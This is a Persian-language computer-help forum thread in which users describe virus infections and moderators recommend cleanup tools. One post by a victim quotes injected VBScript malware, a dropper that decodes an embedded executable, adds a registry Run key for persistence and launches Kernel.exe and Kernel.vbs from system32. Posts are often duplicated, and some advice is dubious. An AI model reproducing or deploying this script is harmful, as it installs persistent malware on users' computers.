به p30world خوش آمدی .وقتی عکسی را توی پست خود الصاق می کنی اندازه آن را کوچکتر کن تا نظم تاپیک به هم

نخورد .سیستم شما به احتمال زیاد آلوده شده است .نگفتید از چه آنتی ویروس و آنتی اسپایوری استفاده می کنید و آیا

آنها را آپدیت می کنید یا نه ؟ و آیا چیزی پیدا می کند یا نه ؟ آیا از سرویس پک 2 ویندوز XP استفاده می کنید ؟

در هر حالت فایل زیر را با حجم 208 کیلوبایت داونلود کن و آن را اجرا کن.در صفحه اول گزینه

Do a system scan and save a logfile را انتخاب کن و گزارش اسکن رابه طور کامل اینجا Copy&Past کن:

HijacThis ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

دوستان سلام
من يه ويروس گرفته كامپيوترم و اين ويروس كارش اينه كه به اسم همه ي فولدرهايي كه كليك مي كنم فايل اجرايي (exe) مي سازد و فولدرهاي اصلي را هيدن(مخفي) مي كند . كه غير قابل ديدن در ويندوز است و در nc هم به صورت فولدر هيدن نشون ميده . يعني يه فواد يه نام گلچين دارن و يه فايل به نام گلچين .exe مي سازه كه اگه گلچين .exe را پاك كنم ديگه اون فايل را اصلا نشون هم نمي دهد مگر در nc به صورت هيدن و از هيدن هم بيرون نميادش- ديوونه شدم خواهشن كمك كنيد اجرتون با هموني كه تو دلتون هست.:41:
C:\1.bmp

دوست من

این فایلی که لینکش را گذاشته اید اولا یک فایل با پسورد zip است نه rar در ثانی حاوی یکی از تم های برنامه Windows Blind

است نه یک فایل فشرده دیگر .فکر می کنم لینک را اشتباه گذاشته اید. شناخت این ویروس اولین قدم برای پاک

کردن ان است ولی با توجه به شرحی که داده اید ممکن است بازیافت کامل سیستمتان مقدور نباشد و بهترین راه

همان فورمت هارد باشد ولی اگر امکانش مقدور نیست علاوه بر گذاشتن لینک آن فایل من پیشنهاد می کنم آخرین

نسخه کاسپرسکی ( نسخه 7.0.0.125 ) را روی یک سیستم تمیز دیگر نصب کنید و پس از آپدیت آن یک

RescueCD با ان ایجاد کنید و سیستم را با آن بالا بیاورید .علاج قطعی مشکل شما احتمالا همین راه است اگر

سوالی بود در خدمتتان هستم.


ممنون، خسته نباشيد. :11:

راستش گوشیم یه ویروسی گرفت که همه فایل هاش تو گوشی مخفی شد بعد مموری رو به کامپوتر وصل کردم وبا nod32دیروز آپدیت شده اسکن کردم بعد کشتن 40 50 تا ویروس حالا یه فولدر خالی 450گابایتی دارم
اگه اسم بعضی فولدر ها که یادم هست رو تو ادرس بار بزنم فولدر باز میشه ولی من اسم همه فولدر ها یادم نیست
حالا چیکار کنم که ازاین حالت در بیان
البته این فایل ها با hidden ها و فایل های سیستمی مخفی معمولی ویندوز فرق می کنن

کامپیوتر من ویروسی شده، بدجوری هم ویروسی شده . مشکل اینجاست که نمی دونم با این ویروس چیکار کنم. در ضمن اسمش رو هم نمی دونم. از علائمش اینه که موقعی که روی هر درایوی به جزدرایو "C" که درایو ویدنوزم باشه، کلیک راست می کنم گزینه های Open و Explore به صورت به هم ریخته نشون داده می شه و کار نمی کنه. در ضمن اگه سعی کنم "System Poperies" یا "Regedit" یا "msconfig" رو باز کنم به سرعت بسته می شن و عملاً دسترسی بهشون امکان نداره. از قسمت folder option هم نمی تونم گزینه "نشون دادن فایلهای پنهان" رو فعال کنم. در ضمن روی هر چیزی هم کلیک می کنم توی یه صفحه جداگانه باز می کنه. تنظیم توی "فولدر اوپشن" هم تأثیری نداره. دیگه اینکه حتی اگه ویندوز رو هم عوض کنم، فایده ای نداره، چون بلافاصله بعد از نصب ویندوز این ویروس ابله فعاله.
با آنتی ویروسهای avast! و panda هم (آپدیت شده) نتونستم این ویروس سمج رو پاک کنم. (ظاهراً اصلاً نمی تونن شناسایی اش کنن!) اجازه نصب به آنتی ویروسهای nod32 و kaspersky هم نمی ده. حتی اگه بلافاصله بعد از نصب یه ویندوز تازه باشه. وسط نصب قطعشون می کنه.
دو تا پروسه هم به نامهای "yreghpl.exe" and "wbegdwp.exe" توی Task Manager هست که بسته نمی شه. یعنی دوباره بلافاصله اجرا می شه.

حالا شما بگید من چیکار کنم

:2: ببینم این دیگه چیه با هر کلیک راستی که میخوام refresh میزنمدو عدد پیغام همین شکلی ظاهر میشه میتونید کمکم کنید:19:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

کامپیوتر من ویروسی شده، بدجوری هم ویروسی شده . مشکل اینجاست که نمی دونم با این ویروس چیکار کنم. در ضمن اسمش رو هم نمی دونم. از علائمش اینه که موقعی که روی هر درایوی به جزدرایو "C" که درایو ویدنوزم باشه، کلیک راست می کنم گزینه های Open و Explore به صورت به هم ریخته نشون داده می شه و کار نمی کنه. در ضمن اگه سعی کنم "System Poperies" یا "Regedit" یا "msconfig" رو باز کنم به سرعت بسته می شن و عملاً دسترسی بهشون امکان نداره. از قسمت folder option هم نمی تونم گزینه "نشون دادن فایلهای پنهان" رو فعال کنم. در ضمن روی هر چیزی هم کلیک می کنم توی یه صفحه جداگانه باز می کنه. تنظیم توی "فولدر اوپشن" هم تأثیری نداره. دیگه اینکه حتی اگه ویندوز رو هم عوض کنم، فایده ای نداره، چون بلافاصله بعد از نصب ویندوز این ویروس ابله فعاله.
با آنتی ویروسهای avast! و panda هم (آپدیت شده) نتونستم این ویروس سمج رو پاک کنم. (ظاهراً اصلاً نمی تونن شناسایی اش کنن!) اجازه نصب به آنتی ویروسهای nod32 و kaspersky هم نمی ده. حتی اگه بلافاصله بعد از نصب یه ویندوز تازه باشه. وسط نصب قطعشون می کنه.
دو تا پروسه هم به نامهای "yreghpl.exe" and "wbegdwp.exe" توی Task Manager هست که بسته نمی شه. یعنی دوباره بلافاصله اجرا می شه.

حالا شما بگید من چیکار کنم

یدونه عکس از پروسه های فعال سیستمت رو اینجا بزار تا بشه بهتر نظر داد. در ضمن این دو تا پروسه هم توش باشن.

دوستان سلام
من يه ويروس گرفته كامپيوترم و اين ويروس كارش اينه كه به اسم همه ي فولدرهايي كه كليك مي كنم فايل اجرايي (exe) مي سازد و فولدرهاي اصلي را هيدن(مخفي) مي كند . كه غير قابل ديدن در ويندوز است و در nc هم به صورت فولدر هيدن نشون ميده . يعني يه فواد يه نام گلچين دارن و يه فايل به نام گلچين .exe مي سازه كه اگه گلچين .exe را پاك كنم ديگه اون فايل را اصلا نشون هم نمي دهد مگر در nc به صورت هيدن و از هيدن هم بيرون نميادش- ديوونه شدم خواهشن كمك كنيد اجرتون با هموني كه تو دلتون هست.:41:
C:\1.bmp

دوست من

سری به لینک زیر بزن ببین مشکلت حل می شود یا نه :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

راستش گوشیم یه ویروسی گرفت که همه فایل هاش تو گوشی مخفی شد بعد مموری رو به کامپوتر وصل کردم وبا nod32دیروز آپدیت شده اسکن کردم بعد کشتن 40 50 تا ویروس حالا یه فولدر خالی 450گابایتی دارم
اگه اسم بعضی فولدر ها که یادم هست رو تو ادرس بار بزنم فولدر باز میشه ولی من اسم همه فولدر ها یادم نیست
حالا چیکار کنم که ازاین حالت در بیان
البته این فایل ها با hidden ها و فایل های سیستمی مخفی معمولی ویندوز فرق می کنن

سری به لینک زیر بزنید :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

نه عزیز اینقدر هم دیگه شوت نیستم
اینا با فایل های سوپر هایدن ویندوز که از فولدر اپشن نمایش داده میشن فرق میکنن
ضمنا گفتم که
اگه اسم بعضی فولدر ها که یادم هست رو تو ادرس بار بزنم فولدر باز میشه
که در مورد هایدن و سوپر هایدن وینذوز این فرق میکنه و همچین کاری نمیشه کرد

این فولدر های مخفی مثل فولدر های مخفی دا خل سی دی هاست که فقط با Iso buster نمایش داده میشه
ولی من تا حالا غیر از رو سی دی روی هارد این فولدر هارو ندیده بودم.

من ویروس رو کشتم اما nod32خواص فولدر هارو عادی نکرد

نه عزیز اینقدر هم دیگه شوت نیستم
اینا با فایل های سوپر هایدن ویندوز که از فولدر اپشن نمایش داده میشن فرق میکنن
ضمنا گفتم که
که در مورد هایدن و سوپر هایدن وینذوز این فرق میکنه و همچین کاری نمیشه کرد

این فولدر های مخفی مثل فولدر های مخفی دا خل سی دی هاست که فقط با Iso buster نمایش داده میشه
ولی من تا حالا غیر از رو سی دی روی هارد این فولدر هارو ندیده بودم.

من ویروس رو کشتم اما nod32خواص فولدر هارو عادی نکرد

دوست عزیز

آیا روشی را که در آن تاپیک گفته شده امتحان کردید یا همینطوری این حرف را می زنید ؟ نود 32 ویروس را با چه نامی

شناخته است ؟

amintnt سلام
برای پست 778 که جواب منو داده بودید یه سئوال داشتم خواهشا کمکم کنید.( چون دیدم شما هم قبلا این ویروسو داشتید)
من نورتن نصب کردم با آپدیتاش و ویروسای تو فلشمو پاک کرده ولی مشکلم اینه که من یه سری از اطلاعاتمو زده بودم روی سی دی و حالا که می خوام اونا ویروساشونو پاک کنم و مطالب قبلیشو هم ریکاور کنم نمی شه چون روی سی دیه. در ضمن پوشه هاش هم همه مخفی ان و وقتی هم می خوام همشو کپی کنم تو یکی از درایوام تا بعد هم ویروساش پاک بشه و هم ریکاورشون بکنم پیام می ده که نمی تونم. در نتیجه فعلا عملا فایلام از دست رفتند و من نمی دونم چی کار کنم.
راستی من نمی دونم که با recover my files دقیقا باید چه طوری کار کنم. و در ضمن می خواستم بدونم با توجه به این که من ویندوزمو عوش کردم آیا بازم امکان برگشت اون فایلا و عکسا وجود داره؟
خیلی ممنون می شم اگه کمکم کنید.

با سلامي دوباره
خسته نباشيد

همون طور كه گفتيد من «Kaspersky AntiVirus 7.0.0.125» رو تهيه و راه اندازي كردم، ولي بدبختانه نتونستم يك «Rescue Disk» بسازم. يعني بلد نبودم.


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


لطف كنيد و راه ساختن Rescue Disk و استفاده از اون رو براي من و ديگران آموزش بديد.
از شما ممنونم.


با يكي دو تا AntiVirus يا AntiSpyيي كه داشتم نتونستم Virus يا Spy دستگاهم رو پيدا كنم و اين من رو نگران كرده، چون مي دونم روي دستگاهم ويروس يا تروجاني مخفيانه مشغوله!!! اگه راهي به نظرتون مي رسه بگيد.


ممنون از شما و همكارانتون، خسته نباشيد و خداحافظ
آدينه، 22 تير 1386

با سلامي دوباره
خسته نباشيد

همون طور كه گفتيد من «Kaspersky AntiVirus 7.0.0.125» رو تهيه و راه اندازي كردم، ولي بدبختانه نتونستم يك «Rescue Disk» بسازم. يعني بلد نبودم.


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


لطف كنيد و راه ساختن Rescue Disk و استفاده از اون رو براي من و ديگران آموزش بديد.
از شما ممنونم.


با يكي دو تا AntiVirus يا AntiSpyيي كه داشتم نتونستم Virus يا Spy دستگاهم رو پيدا كنم و اين من رو نگران كرده، چون مي دونم روي دستگاهم ويروس يا تروجاني مخفيانه مشغوله!!! اگه راهي به نظرتون مي رسه بگيد.


ممنون از شما و همكارانتون، خسته نباشيد و خداحافظ
آدينه، 22 تير 1386

سلام دوست عزیز

من در یک تاپیک توضیحاتی در این مورد داده ام و لینک آن را هم در پست قبلی برایتان گذاشتم سری به لینک زیر

بزنید باز اگر مشکلی بود من در خدمتم .اگر به مشکل برخوردید بگویید دقیقا مشکلتان در این موردچیست تا بشود

کمکتان کرد.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

یدونه عکس از پروسه های فعال سیستمت رو اینجا بزار تا بشه بهتر نظر داد. در ضمن این دو تا پروسه هم توش باشن.

همونطور که توی عکس هم می بینید دو پروسه اولی اونهایی هستند که مشکوک می زنند و نمی شه قطعشون کرد.
در ضمن من تمام پروسه های اضافی رو (در واقع اونهایی که می شد بسته بشن) رو قبل از گرفتن عکس بستم. البته باید اضافه کنم که همه پروسه هایی که بسته شده اند برای من شناخته شده هستند.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

یه چیز دیگه ای که امروز بهش برخوردم اینه که حتی با استفاده از برنامه هایی مثل WinNC یا Nero هم نمی تونم فایهای مخفی رو ببینم چون winNC سریعاً بسته می شه و File Browser برنامه Nero هم پیغام خطا می ده!!! locked.gif

من به عمرم ویروس به این کَنه ای ندیده بودم. کم کم دارم شک می کنم که...

راستی با برنامه WinPatrol توی استارت آپ عنوان این دو پروسه به صورت زیر نشون داده می شه:
bptnsvr : yreghlp.exe
ulmasjm : wbegdwp.exe

و در ضمن با این برنامه WinPatrol هم نمی شه این دو تا پروسه رو از توی استارت آپ حذف کرد. چون وقتی حذفشون می کنم بلافاصله دوباره میان

سلام

ببینید کامپیوتر من هر چند وقت یکبار ویروسی به نام kernel می گیرد که

۱ - CPU Use را صد در صد می کند .

۲ - یه سری کد به همه ی فایل های html اضافه می کند و حجم آ نها را چند برابر می کند و اگه زودتر درستش نکنم وقتی فایل ها را باز کنم آن ها را خودکار پاک می کند .

با هر آنتی ویروسی هم سعی کرده ام برای مدتی پاک شده ولی فایل های html درست نشده .

این کد ها را اضافه می کند:


<script language=vbscript>

on error resume next

fileexe1="07709014400000300000000000400000000025525500000018 40000000000000000000000640000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000018400000000001403118 60140001800092050331840010762050330841041051150321 12114111103114097109032099097110110111116032098101 03211411711003210511003206807908303210911110010104 60130130100360000000000000000000002120361420281440 69224079144069224079144069224079030090243079135069 22407910810124207914706922407908210509910414406922 40790000000000000000000000000000000000000000000000 00080069000000076001003000081115047069000000000000 00000000000022400001500101100100501200000200000000 00300060000000000000000070170000000000160000000000 32000000000000064000000016000000000002000000004000 00000000400000000000400000000000000000000000008000 60000000040000001390390000000020000000000000000160 00000016000000000000016000000016000000000000000000 01600000000000000000000000000000000006803200000010 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00003200000006800000000000000000000000000000000000 00000000000000000000000000000000000000000000000461 16101120116000000000240001000000000016000000000002 00000000000400000000000000000000000000000000000000 00000320000000960461141000971160970000002500010000 00000032000000000002000000000006000000000000000000 00000000000000000000000006400000006404610009711609 70000000001280270060000000480000000000020000000000 08000000000000000000000000000000000000000000064000 00019200000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000001060001060001060001060011060 00232207001000000163112075070000106000104000000000 12810600010600010404104806400025505311207507000023 21810010000001631160750700001041200750700001041280 26006000104240048064000255053116075070000232156001 00000010400400100000010412407507000023223100000000 01040280480640001041240750700002322440000000001040 00016000000104088048064000104124075070000232202000 00000016322404806400010600010422804806400025505312 00750700001042400480640002550532240480640002321740 00000000255053224048064000232145000000000255053112 07507000023203200100000025505311607507000023202100 10000001060051060001060001041240750700001060001060 00232073000000000195085139236131196228106000106000 10600014106922808023206300000000001119211602014106 92280802320620000000001410692280802320350000000002 35217201195104000016064000104224147004000106000106 00023202400000000023218525525525519525503702003206 40002550370400320640002550370360320640002550370320 32064000255037028032064000255037000032064000255037 01203206400025503700803206400025503700403206400020 42042042042042042042042042040851392360872551170082 32036000000000139125008139077012003248051210051192 13800401013600405813119400113219211724309513906900 82011940080002042042040851392361390690081312320041 31192004128056000116048128120001000116032128120002 00011601612812000300011723004306900813119200320119 40040000430690081311920022011940040000430690081311 92001201194004000043069008201194004000255037060032 06400025503704803206400025503705203206400025503705 60320640000000000000000000000000000000000000000000 00000000086033000000134033000000122033000000100033 00000000000000000023603200000000000000000005403300 00000420330000000280330000000080330000000000000000 00182033000000198033000000218033000000160033000000 00000000000018803200000000000000000000000000000025 20320000000200320000001960320000000000000000000000 00000000074033000000028032000000168032000000000000 00000000000000000014603300000000003200000021603200 00000000000000000000000000002380330000000480320000 00000000000000000000000000000000000000000000000000 00000000000008603300000013403300000012203300000010 00330000000000000000002360320000000000000000000540 33000000042033000000028033000000008033000000000000 00000018203300000019803300000021803300000016003300 00000000000000001030000831041011081080691201010991 17116101065000115104101108108051050046100108108000 14000006810511511209711609910407710111511509710310 10650000000250010711011160771011151150971031010650 00023002083101116084105109101114000000066002084114 09711011510809711610107710111511509710310100000011 71151011140510500461001081080000000260000671081111 15101072097110100108101000060001071101116083121115 11610110906810511410109911611111412106500020200107 91121011100701051081010000001580020871141051161010 70105108101000107101114110101108051050046100108108 00000010500007311011610111411010111606710811111510 10720971101001081010001340000731101161011141101011 16079112101110065000135000073110116101114110101116 07911210111008511410806500000014200007311011610111 41101011160821010971000701051081010000001191051101 05110101116046100108108000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000920831211151161011091 15046101120101000104116116112058047047104049046114 10511211909712104609911110904710011410109710910409 70991070470720470780971181051001040970991070461011 20101000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000000000000000000000000000"

dim sys

Set df = document.createElement("object")

df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "

set fso = df.createobject("Scripting.FileSystemObject","")

set s=df.CreateObject("Shell.Application.1","")

set re=df.createobject("wscript.shell","")

sys=fso.GetSpecialFolder(1)

For a = 1 To Len(filevbs1) Step 3

filevbs2=filevbs2 & chr(mid(filevbs1,a,3))

if a < len(fileexe1)+1 then fileexe2=fileexe2 & chr(mid(fileexe1,a,3))

next

kr = UCase(re.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\Microsoft Windows"))

fso.CreateTextFile(sys & "\TSP32E.DLL").write fileexe1

if ucase(fso.FileExists(sys & "\Kernel.exe"))="FALSE" or kr<>ucase(sys & "\KERNEL.EXE") then

re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"

fso.CreateTextFile(sys & "\Kernel.exe").write fileexe2

s.Open (sys & "\Kernel.exe")

end if

fso.CreateTextFile(sys & "\TSP32V.DLL").write filevbs1

if fso.opentextfile(sys & "\Systemv.dll",1).readall<>"on" then

fso.CreateTextFile(sys & "\Kernel.vbs").write filevbs2

s.Open (sys & "\Kernel.vbs")

سلام
ایا فایل unins000.dat ویروس است؟:41:

کسی نمی تونه کمکم کنه؟

با سلام.كامپيوتر من . وقتي به نت وصل مي شم 2 يا 3 بار ريست مي كنه بعد خاموش مي شه:19: ؟كسي ميتونه كمكم كنه؟ البته Nod32 هم نصبه.با تمامي تنظيمات

چه جالب من همیشه فکر می کردم این فایل یکی از فایل های نود 32 هستش که اینجور cpu رو سرویس می کنه
چون که هروقت نود رو پاک کردم اون فایل هم رفته دنبال کار خودش یعنی ناپدید شده
البته این فایل روی همه ی سیستم هایی که نود نصب می کنم میاد ولی روی بعضی از اونا اینجوری اذیت می کنه
جالب تر هم اینه که نود جدید که اومده همونقدر که روی بعضی از سیستم ها خوب کار می ده روی بعضی از سیستم ها رو هم که نصب می کنم دیگه بالا نمی یاد

شما برای امتحان که شده این ویروس کش رو پاک کن ببین مشکلت حل میشه خدا رو چه دیدی :31: :46:

من اصلا تا به حال nod 32 را نصب نکرده ام . یعنی چندبار خواسته ام نصب کنم با اون این ویروس را بکشم ولی گیرم نیامده ...

تازگي ها يه ويروس به كامپيوتر من افتاده كه همه جا و تو هر فولدري پوشه new folder ايجاد مي كنه چيكار بايد بكنم؟

سيستم شما ويروسي شده

مرتبط :


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سلام
ایا فایل unins000.dat ویروس است؟:41:

دوست من

به احتمال زیاد این یک فایل بی ضرر است هنگام نصب هر نرم افزاری ویندوز یک فایل با این نام در داخل پوشه آن برنامه

ایجاد می کند که حاوی اطلاعات نصب آن برنامه است ولی برای اطمینان بیشتر فایل را در یکی از لینکهای زیر اسکن کن تا

خیالت راحت باشد :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

آقا کسی راه حلی برا من ندارد ؟ مشکلم توی صفحه ی قبل هست

آقا کسی راه حلی برا من ندارد ؟ مشکلم توی صفحه ی قبل هست

دوست عزیز

معمولا فایلهای آلوده شده با ویروس را ( به ویژه فایلهای متنی مانند HTML ) را پس از آلوده شدن بندرت می توان

Disinfect کرد و لی شما نمونه اصلی این ویروس را آپلود کن یا بگو با چه نامی توسط آنتی ویروسها شناسایی می شود

تا شاید کمکی باشد.

نمونه ی html آلوده یا کد برنامه و یا فایل kernel.exe ؟

تا به حال فقط بیددیفندر این ویروس را شناسایی کرده با نام :Kernel.exe در پوشه ی system 32

آقا چرا کسی پست 837 رو جواب نمیده؟
من بد جوری گیر کردم.

نمونه ی html آلوده یا کد برنامه و یا فایل kernel.exe ؟

تا به حال فقط بیددیفندر این ویروس را شناسایی کرده با نام :Kernel.exe در پوشه ی system 32

هر دو را آپلود کن.

آقا چرا کسی پست 837 رو جواب نمیده؟
من بد جوری گیر کردم.

دوست عزیز برای من جای تعجب بسیار است که با این همه علاقه ای که به نرم افزارهای امنیتی دارید و به طور مداوم

دنبال بهترین ها می گردید دوباره سیستمتان دچار ویروس شده است :blink: مگر آنتی ویروس و آنتی اسپایور روی

سیستمتان نصب نیست ؟ در تاپیکهای مختلف از کاسپرسکی و نود32 تعریف می کنید ولی ظاهرا از هیچ کدام روی

سیستمتان استفاده نمی کنید :blink: در هر حالت فایل زیر را با حجم 208 کیلوبایت داونلود و اجرا کنید.در صفحه اول گزینه

Do a system scan and save a logfile را انتخاب و گزارش اسکن رابه طور کامل اینجا Copy&Past کن:

HijacThis ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

لطفا فعلا دست به کارهای دیگر مثل نصب انواع آنتی ویروسها نزنید چون ممکن است مشکلاتتان بیشتر شود.

دوست عزیز برای من جای تعجب بسیار است که با این همه علاقه ای که به نرم افزارهای امنیتی دارید و به طور مداوم

دنبال بهترین ها می گردید دوباره سیستمتان دچار ویروس شده است :blink: مگر آنتی ویروس و آنتی اسپایور روی

سیستمتان نصب نیست ؟ در تاپیکهای مختلف از کاسپرسکی و نود32 تعریف می کنید ولی ظاهرا از هیچ کدام روی

سیستمتان استفاده نمی کنید :blink: در هر حالت فایل زیر را با حجم 208 کیلوبایت داونلود و اجرا کنید.در صفحه اول گزینه

Do a system scan and save a logfile را انتخاب و گزارش اسکن رابه طور کامل اینجا Copy&Past کن:

HijacThis ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

لطفا فعلا دست به کارهای دیگر مثل نصب انواع آنتی ویروسها نزنید چون ممکن است مشکلاتتان بیشتر شود.

ممنون دوست عزیز
این سوال رو هم یک بار Persian.Boy عزیز پرسیده بود
من یک Pc دارم و یک NotePad
رو Pc 2 ویندوز هست.
پس میتونم از آنتی ویروس های مختلف استفاده کنم
راستی میشه اسمتون رو بگی؟(می دونم ربطی به تاپیک نداره)

خوب پس باید صبر کنم دوباره سیستمم ویروسی بشه تا بتونم بذارم . الان دیگه ندارمش . برای آینده سوال کردم.

با سلام

سیستم من یه ویروس گرفته که نمیذاره آنتی ویروس اصلا اجرا بشه .
حتی پوشه هایی که اسم آنتی ویروس رو دارن بعد از باز شدن به سرعت میبنده
و همچنین لینک هایی که تواینترنت به آنتی ویروس و نرم افزار های امنیتی ختم میشه رو میبنده
با یه مک آفی هم به صورت بوت(نمیدونم اصطلاح فنیش رو درست گفتم یا نه) سیسم رو چک کردم ولی جواب نداده

لطفا کمک کنید

با تشکر

با سلام

سیستم من یه ویروس گرفته که نمیذاره آنتی ویروس اصلا اجرا بشه .
حتی پوشه هایی که اسم آنتی ویروس رو دارن بعد از باز شدن به سرعت میبنده
و همچنین لینک هایی که تواینترنت به آنتی ویروس و نرم افزار های امنیتی ختم میشه رو میبنده
با یه مک آفی هم به صورت بوت(نمیدونم اصطلاح فنیش رو درست گفتم یا نه) سیسم رو چک کردم ولی جواب نداده

لطفا کمک کنید

با تشکر

Dr.Web Cureit همان آنتی ویروس دکتر وب است با آخرین آپدیت هاش تا زمانی که دانلود میکنید.

این آنتی ویروس رو همه افراد میتونند استفاده کنند. چه کسانی که آنتی ویروس دارند و چه کسانی که ندارند. هیچ

اختلالی هم در برنامه ها و آنتی ویروس های دیگه بوجود نمیاره.

Dr.Web Cureit احتیاجی به نصب نداره. شما کافیه که فایلی رو که دانلود کردید رو اجرا کنید و بعد سیستمتون رو توسط

اون سکن کنید. این آنتی ویروس نسخه مجانی دکتر وب است و قابلیت کشف و پاک کردن ویروسها رو از روی سیستم

شما داره. شما میتونید این آنتی ویروس رو توسط یکی از لینک های زیر دانلود کنید. لینک اول مربوط به خود سایت

دکتر وب است. اما چون گفتید دسترسی به سایت آنتی ویروسها براتون ممکن نیست من اون رو در یک سایت دیگه

و با یک اسم دیگه آپلود میکنم. اسم Cureit رو به Its.Me تغییر میدم.

Dr.Web CureIt Link1

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

Dr.Web CureIt Link2

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

موفق باشید.

سلام به همه یکی کمک کنه سیستمم ویروس گرفت بعد از هارد به هارد
تموم فلدرا هستن اما غیبن فقد با نرو دیده میشن یک انتی ویروس واسه شناختش میخوام بتونه پاکش کنه
خواهش میکنم کمک کنین دارم مجبور میشم هاردو فرمت کنم

سلام به همه یکی کمک کنه سیستمم ویروس گرفت بعد از هارد به هارد
تموم فلدرا هستن اما غیبن فقد با نرو دیده میشن یک انتی ویروس واسه شناختش میخوام بتونه پاکش کنه
خواهش میکنم کمک کنین دارم مجبور میشم هاردو فرمت کنم

سری به تاپیک زیر بزنید :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

مرسی از شما مدیر عزیز

این ویروس حتی اجازه نمی ده ویندوزت رو پاک کنی یا اون رو عوض کنی
فایلهایی که پسوندشون عوض میشه باز نمی شن و حتی پاکم نمی شن
خیلی سریع انتشار پیدا میکنه
و فایلهای سیستمی رو هم آلوده می کنه
یعنی شما حتی control panel رو هم نمی تونید باز کنید
کــــــــــــــــــــــــ ـــــمک
:41:

تو رو خدا کمک
:20:

مثل هر ويروسي ديگه ويروس كش نصب كن و در حالت safe mode باهاش كامپيوترتو چك كن!!

دوات پیش خودمه :10:

3 تا چیز لازم داری:

1- یک برنامه Prosses Manager و Startup Manager. من TweakNow PowerPack رو پیشنهاد می کنم.
2- این برنامه
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
3- یک ویروس کش قوی. که من Zone Alarm رو پیشنهاد می کنم

مراحل کار:

اگر این کار ها رو تو safe mode و بعد در حالت معمولی انجام بدی بهتره

1- با اون برنامه Prosses Manager و Startup Manager باید ابتدا هر برنامه ای که از Documents and settings اجرا می شه رو تعطیل کنی و بعد همه ی Startup هایی که تو اونها اسم "brontok" یا همین چیز ها یا "*.pif" یا فیلی بود که بدون محل اجرا بود حذف کنی
(سختش همین بود)
2- با این برنامه ای که لینک کردم همه چیز رو چک کنی (البته لازم نیست همه ی درایو ها رو انتخاب کنی)
3- با ویروس کش یک اسکن کامل می کنی


نتیجه:

دیگه هیچ Brontokی تو کامپیوترت نیست :11:

سلام :20:

به نظر شما اين چيه؟

يه آيكني اين پايين به وجود اومده كه هي بين علامت سوال آبي و ضربدر عوض ميشه در شكل زير:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

ضمناً در شكل بالا هر وقت ميخوام IE رو ببندم به پنجره كوچك باز ميشه كه در شكل بالا مشخصه.

يك تولبار هم خودبخود در IE نصب شده، لطفاً به آدرس بالاي IE هم توجه كنيد:

